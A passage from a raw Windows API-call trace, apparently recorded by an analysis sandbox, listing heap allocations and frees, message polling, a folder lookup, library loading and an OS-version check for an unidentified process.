(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.550] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0267.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.551] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.553] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/My Videos", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x13bce, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0xaa58a0 [0267.553] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0267.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.553] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.554] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.554] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.554] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.554] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.555] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.555] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.555] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.555] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.555] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.556] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0267.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.556] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0267.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.556] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0267.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.556] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.557] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.557] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.557] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.557] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0267.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.557] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.557] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.558] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.558] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.558] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.558] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: 